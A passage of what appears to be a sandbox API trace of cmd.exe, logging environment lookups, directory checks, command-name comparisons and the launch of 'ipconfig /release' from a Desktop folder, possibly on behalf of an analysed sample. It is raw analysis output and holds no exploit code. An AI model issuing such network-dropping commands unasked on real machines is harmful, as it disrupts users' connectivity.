lpBuffer="") returned 0x63 [0280.948] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0280.948] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.948] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0280.948] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0280.948] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0280.948] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0280.948] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0280.949] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0280.949] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0280.949] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0280.949] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0280.949] GetProcessHeap () returned 0x620000 [0280.949] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x628700) returned 1 [0280.949] GetEnvironmentStringsW () returned 0x627cd8* [0280.949] GetProcessHeap () returned 0x620000 [0280.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa32) returned 0x62a7a8 [0280.950] FreeEnvironmentStringsA (penv="A") returned 1 [0280.959] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0280.959] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.960] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0280.960] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0280.960] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0280.960] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0280.960] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0280.960] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0280.960] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0280.960] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0280.960] GetProcessHeap () returned 0x620000 [0280.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x44) returned 0x6205c8 [0280.960] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0280.960] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0280.960] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0280.960] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x620618 [0280.961] FindClose (in: hFindFile=0x620618 | out: hFindFile=0x620618) returned 1 [0280.961] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x620618 [0280.961] FindClose (in: hFindFile=0x620618 | out: hFindFile=0x620618) returned 1 [0280.961] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0280.961] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x620618 [0280.961] FindClose (in: hFindFile=0x620618 | out: hFindFile=0x620618) returned 1 [0280.961] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0280.961] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0280.961] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0280.961] GetProcessHeap () returned 0x620000 [0280.962] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62a7a8) returned 1 [0280.962] GetEnvironmentStringsW () returned 0x627cd8* [0280.962] GetProcessHeap () returned 0x620000 [0280.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa76) returned 0x629d68 [0280.962] FreeEnvironmentStringsA (penv="=") returned 1 [0280.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0280.962] GetProcessHeap () returned 0x620000 [0280.962] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x6205c8) returned 1 [0280.962] GetProcessHeap () returned 0x620000 [0280.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400e) returned 0x62bc68 [0280.963] GetProcessHeap () returned 0x620000 [0280.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x62a7e8 [0280.963] GetProcessHeap () returned 0x620000 [0280.963] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bc68) returned 1 [0280.963] GetConsoleOutputCP () returned 0x1b5 [0280.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0280.980] GetUserDefaultLCID () returned 0x409 [0280.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0280.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0280.981] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0280.982] GetProcessHeap () returned 0x620000 [0280.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20c) returned 0x62a868 [0280.983] GetConsoleTitleW (in: lpConsoleTitle=0x62a868, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0281.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0281.010] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0281.010] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0281.010] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0281.010] GetProcessHeap () returned 0x620000 [0281.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400a) returned 0x62bc68 [0281.010] GetProcessHeap () returned 0x620000 [0281.011] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bc68) returned 1 [0281.012] _wcsicmp (_String1="ipconfig", _String2=")") returned 64 [0281.012] _wcsicmp (_String1="FOR", _String2="ipconfig") returned -3 [0281.012] _wcsicmp (_String1="FOR/?", _String2="ipconfig") returned -3 [0281.012] _wcsicmp (_String1="IF", _String2="ipconfig") returned -10 [0281.012] _wcsicmp (_String1="IF/?", _String2="ipconfig") returned -10 [0281.012] _wcsicmp (_String1="REM", _String2="ipconfig") returned 9 [0281.012] _wcsicmp (_String1="REM/?", _String2="ipconfig") returned 9 [0281.012] GetProcessHeap () returned 0x620000 [0281.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x58) returned 0x62aa80 [0281.012] GetProcessHeap () returned 0x620000 [0281.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x620578 [0281.012] GetProcessHeap () returned 0x620000 [0281.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x62aae0 [0281.013] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0281.026] _wcsicmp (_String1="ipconfig", _String2="DIR") returned 5 [0281.026] _wcsicmp (_String1="ipconfig", _String2="ERASE") returned 4 [0281.026] _wcsicmp (_String1="ipconfig", _String2="DEL") returned 5 [0281.026] _wcsicmp (_String1="ipconfig", _String2="TYPE") returned -11 [0281.026] _wcsicmp (_String1="ipconfig", _String2="COPY") returned 6 [0281.026] _wcsicmp (_String1="ipconfig", _String2="CD") returned 6 [0281.026] _wcsicmp (_String1="ipconfig", _String2="CHDIR") returned 6 [0281.026] _wcsicmp (_String1="ipconfig", _String2="RENAME") returned -9 [0281.026] _wcsicmp (_String1="ipconfig", _String2="REN") returned -9 [0281.026] _wcsicmp (_String1="ipconfig", _String2="ECHO") returned 4 [0281.026] _wcsicmp (_String1="ipconfig", _String2="SET") returned -10 [0281.026] _wcsicmp (_String1="ipconfig", _String2="PAUSE") returned -7 [0281.026] _wcsicmp (_String1="ipconfig", _String2="DATE") returned 5 [0281.027] _wcsicmp (_String1="ipconfig", _String2="TIME") returned -11 [0281.027] _wcsicmp (_String1="ipconfig", _String2="PROMPT") returned -7 [0281.027] _wcsicmp (_String1="ipconfig", _String2="MD") returned -4 [0281.027] _wcsicmp (_String1="ipconfig", _String2="MKDIR") returned -4 [0281.027] _wcsicmp (_String1="ipconfig", _String2="RD") returned -9 [0281.027] _wcsicmp (_String1="ipconfig", _String2="RMDIR") returned -9 [0281.027] _wcsicmp (_String1="ipconfig", _String2="PATH") returned -7 [0281.027] _wcsicmp (_String1="ipconfig", _String2="GOTO") returned 2 [0281.027] _wcsicmp (_String1="ipconfig", _String2="SHIFT") returned -10 [0281.027] _wcsicmp (_String1="ipconfig", _String2="CLS") returned 6 [0281.027] _wcsicmp (_String1="ipconfig", _String2="CALL") returned 6 [0281.027] _wcsicmp (_String1="ipconfig", _String2="VERIFY") returned -13 [0281.027] _wcsicmp (_String1="ipconfig", _String2="VER") returned -13 [0281.027] _wcsicmp (_String1="ipconfig", _String2="VOL") returned -13 [0281.027] _wcsicmp (_String1="ipconfig", _String2="EXIT") returned 4 [0281.027] _wcsicmp (_String1="ipconfig", _String2="SETLOCAL") returned -10 [0281.027] _wcsicmp (_String1="ipconfig", _String2="ENDLOCAL") returned 4 [0281.027] _wcsicmp (_String1="ipconfig", _String2="TITLE") returned -11 [0281.027] _wcsicmp (_String1="ipconfig", _String2="START") returned -10 [0281.027] _wcsicmp (_String1="ipconfig", _String2="DPATH") returned 5 [0281.027] _wcsicmp (_String1="ipconfig", _String2="KEYS") returned -2 [0281.027] _wcsicmp (_String1="ipconfig", _String2="MOVE") returned -4 [0281.027] _wcsicmp (_String1="ipconfig", _String2="PUSHD") returned -7 [0281.027] _wcsicmp (_String1="ipconfig", _String2="POPD") returned -7 [0281.027] _wcsicmp (_String1="ipconfig", _String2="ASSOC") returned 8 [0281.027] _wcsicmp (_String1="ipconfig", _String2="FTYPE") returned 3 [0281.027] _wcsicmp (_String1="ipconfig", _String2="BREAK") returned 7 [0281.028] _wcsicmp (_String1="ipconfig", _String2="COLOR") returned 6 [0281.028] _wcsicmp (_String1="ipconfig", _String2="MKLINK") returned -4 [0281.028] _wcsicmp (_String1="ipconfig", _String2="DIR") returned 5 [0281.028] _wcsicmp (_String1="ipconfig", _String2="ERASE") returned 4 [0281.028] _wcsicmp (_String1="ipconfig", _String2="DEL") returned 5 [0281.028] _wcsicmp (_String1="ipconfig", _String2="TYPE") returned -11 [0281.028] _wcsicmp (_String1="ipconfig", _String2="COPY") returned 6 [0281.028] _wcsicmp (_String1="ipconfig", _String2="CD") returned 6 [0281.028] _wcsicmp (_String1="ipconfig", _String2="CHDIR") returned 6 [0281.028] _wcsicmp (_String1="ipconfig", _String2="RENAME") returned -9 [0281.028] _wcsicmp (_String1="ipconfig", _String2="REN") returned -9 [0281.028] _wcsicmp (_String1="ipconfig", _String2="ECHO") returned 4 [0281.028] _wcsicmp (_String1="ipconfig", _String2="SET") returned -10 [0281.028] _wcsicmp (_String1="ipconfig", _String2="PAUSE") returned -7 [0281.028] _wcsicmp (_String1="ipconfig", _String2="DATE") returned 5 [0281.028] _wcsicmp (_String1="ipconfig", _String2="TIME") returned -11 [0281.028] _wcsicmp (_String1="ipconfig", _String2="PROMPT") returned -7 [0281.028] _wcsicmp (_String1="ipconfig", _String2="MD") returned -4 [0281.028] _wcsicmp (_String1="ipconfig", _String2="MKDIR") returned -4 [0281.028] _wcsicmp (_String1="ipconfig", _String2="RD") returned -9 [0281.028] _wcsicmp (_String1="ipconfig", _String2="RMDIR") returned -9 [0281.028] _wcsicmp (_String1="ipconfig", _String2="PATH") returned -7 [0281.028] _wcsicmp (_String1="ipconfig", _String2="GOTO") returned 2 [0281.028] _wcsicmp (_String1="ipconfig", _String2="SHIFT") returned -10 [0281.028] _wcsicmp (_String1="ipconfig", _String2="CLS") returned 6 [0281.028] _wcsicmp (_String1="ipconfig", _String2="CALL") returned 6 [0281.029] _wcsicmp (_String1="ipconfig", _String2="VERIFY") returned -13 [0281.029] _wcsicmp (_String1="ipconfig", _String2="VER") returned -13 [0281.029] _wcsicmp (_String1="ipconfig", _String2="VOL") returned -13 [0281.029] _wcsicmp (_String1="ipconfig", _String2="EXIT") returned 4 [0281.029] _wcsicmp (_String1="ipconfig", _String2="SETLOCAL") returned -10 [0281.029] _wcsicmp (_String1="ipconfig", _String2="ENDLOCAL") returned 4 [0281.029] _wcsicmp (_String1="ipconfig", _String2="TITLE") returned -11 [0281.029] _wcsicmp (_String1="ipconfig", _String2="START") returned -10 [0281.029] _wcsicmp (_String1="ipconfig", _String2="DPATH") returned 5 [0281.029] _wcsicmp (_String1="ipconfig", _String2="KEYS") returned -2 [0281.029] _wcsicmp (_String1="ipconfig", _String2="MOVE") returned -4 [0281.029] _wcsicmp (_String1="ipconfig", _String2="PUSHD") returned -7 [0281.029] _wcsicmp (_String1="ipconfig", _String2="POPD") returned -7 [0281.029] _wcsicmp (_String1="ipconfig", _String2="ASSOC") returned 8 [0281.029] _wcsicmp (_String1="ipconfig", _String2="FTYPE") returned 3 [0281.029] _wcsicmp (_String1="ipconfig", _String2="BREAK") returned 7 [0281.029] _wcsicmp (_String1="ipconfig", _String2="COLOR") returned 6 [0281.029] _wcsicmp (_String1="ipconfig", _String2="MKLINK") returned -4 [0281.029] _wcsicmp (_String1="ipconfig", _String2="FOR") returned 3 [0281.029] _wcsicmp (_String1="ipconfig", _String2="IF") returned 10 [0281.029] _wcsicmp (_String1="ipconfig", _String2="REM") returned -9 [0281.030] GetProcessHeap () returned 0x620000 [0281.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x62ab08 [0281.030] GetProcessHeap () returned 0x620000 [0281.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x62ad20 [0281.030] _wcsnicmp (_String1="ipco", _String2="cmd ", _MaxCount=0x4) returned 6 [0281.030] GetProcessHeap () returned 0x620000 [0281.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x418) returned 0x62ad58 [0281.030] SetErrorMode (uMode=0x0) returned 0x0 [0281.031] SetErrorMode (uMode=0x1) returned 0x0 [0281.031] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x62ad60, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0281.031] SetErrorMode (uMode=0x0) returned 0x1 [0281.031] GetProcessHeap () returned 0x620000 [0281.031] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62ad58, Size=0x56) returned 0x62ad58 [0281.031] GetProcessHeap () returned 0x620000 [0281.031] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62ad58) returned 0x56 [0281.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0281.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0281.031] GetProcessHeap () returned 0x620000 [0281.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x110) returned 0x62adb8 [0281.031] GetProcessHeap () returned 0x620000 [0281.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x218) returned 0x62aed0 [0281.039] GetProcessHeap () returned 0x620000 [0281.039] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62aed0, Size=0x112) returned 0x62aed0 [0281.039] GetProcessHeap () returned 0x620000 [0281.039] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62aed0) returned 0x112 [0281.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0281.039] GetProcessHeap () returned 0x620000 [0281.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe0) returned 0x62aff0 [0281.041] GetProcessHeap () returned 0x620000 [0281.041] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62aff0, Size=0x76) returned 0x62aff0 [0281.041] GetProcessHeap () returned 0x620000 [0281.041] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62aff0) returned 0x76 [0281.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0281.042] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ipconfig.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0281.043] GetLastError () returned 0x2 [0281.043] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0281.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x62b070 [0281.043] GetProcessHeap () returned 0x620000 [0281.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x6277a0 [0281.043] FindClose (in: hFindFile=0x62b070 | out: hFindFile=0x62b070) returned 1 [0281.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0281.044] GetLastError () returned 0x2 [0281.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x62b070 [0281.044] GetProcessHeap () returned 0x620000 [0281.044] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6277a0, Size=0x4) returned 0x62b0b0 [0281.044] FindClose (in: hFindFile=0x62b070 | out: hFindFile=0x62b070) returned 1 [0281.044] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0281.044] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0281.044] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0281.061] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0281.061] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0281.061] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0281.061] GetProcessHeap () returned 0x620000 [0281.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x627720 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0281.061] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0281.062] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0281.062] GetProcessHeap () returned 0x620000 [0281.062] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x627720) returned 1 [0281.062] GetProcessHeap () returned 0x620000 [0281.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa) returned 0x62b070 [0281.062] lstrcmpW (lpString1="\\ipconfig.exe", lpString2="\\XCOPY.EXE") returned -1 [0281.065] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\ipconfig.exe", lpCommandLine="ipconfig /release", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ipconfig /release", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="ipconfig /release", lpProcessInformation=0x19f6fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc24, dwThreadId=0x1384)) returned 1 [0281.307] CloseHandle (hObject=0xa4) returned 1 [0281.307] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0281.307] GetProcessHeap () returned 0x620000 [0281.307] RtlFreeHeap (HeapHandle=0x620000, 